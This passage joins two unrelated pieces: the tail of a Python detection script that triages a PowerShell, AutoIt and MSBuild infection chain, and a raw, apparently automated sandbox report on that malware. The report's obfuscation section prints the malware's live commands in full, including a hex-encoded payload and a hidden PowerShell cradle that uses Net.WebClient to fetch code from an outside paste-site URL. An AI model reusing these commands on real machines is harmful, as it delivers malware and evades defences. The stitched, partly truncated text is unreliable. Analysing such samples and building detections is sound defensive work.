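         r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;'''
         r'''Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{'''
         r'''(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name)'''),
    Proc(PS, ACRO, rf'"{ACRO}" "C:\Users\user\AppData\Roaming\i1040gi.pdf"'),
    Proc(PS, UPDATER, rf'"{UPDATER}" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll'),
    Proc(UPDATER, MSBUILD, MSBUILD),
    Proc(ACRO, ACROCEF, rf'"{ACROCEF}" --backgroundcolor=16777215'),   # benign control record
    Proc(ACROCEF, AUTOIT, rf'"{AUTOIT}" C:\faggbgb\ggkfcbc.a3x'),
    Proc(AUTOIT, MSBUILD, MSBUILD),
]

if __name__ == "__main__":
    for edge, reasons in triage(RECORDS).items():
        print(edge)
        for reason in reasons:
            print("   -", reason)
```

The MSBuild rule is the one worth tuning in a real environment: a project-less MSBuild.exe is rare outside developer boxes, so the parent allow-list can stay short, while the PowerShell flag rule fires on plenty of administrative scripts and is best weighted by the two obfuscation idioms (the Variable: glob and the Get-Member member selection), which have no legitimate use in a command line.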
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Wind
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: wsock32.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: version.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: winmm.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: mpr.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: wininet.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: iphlpapi.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: userenv.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: uxtheme.dll
                    Source: C:\faggbgb\AutoIt3.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: Binary string: l\System.pdbuPH source: powershell.exe, 00000002.00000002.2558487594.00000000072C0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: em.pdb source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2530957813.0000000000D78000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95
C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable 